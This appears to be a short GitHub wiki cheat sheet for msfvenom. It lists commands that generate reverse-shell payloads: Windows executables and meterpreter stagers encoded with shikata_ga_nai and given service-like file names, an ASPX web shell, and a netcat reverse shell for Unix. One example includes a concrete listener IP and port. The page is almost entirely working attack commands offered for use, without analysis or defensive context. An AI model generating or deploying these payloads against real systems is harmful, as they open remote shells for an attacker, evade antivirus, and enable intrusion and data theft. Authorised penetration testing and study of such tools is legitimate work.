Skip to content

MSFVenom

Alvin Smith edited this page Apr 21, 2021 · 19 revisions

Cheat Sheet

https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/

Samples

  • msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe -o ASCService.exe
  • msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe
  • msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
  • i.e. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.4.3.98 LPORT=4443 -f exe -o reverseTCP.exe
x64

msfvenom -p windows/x64/shell_reverse_tcp LHOST="ip" LPORT=4242 -f aspx > shell.aspx

Output as Raw

msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R

Others

Shikata Ga Nai

https://security.stackexchange.com/questions/130256/what-is-shikata-ga-nai

Clone this wiki locally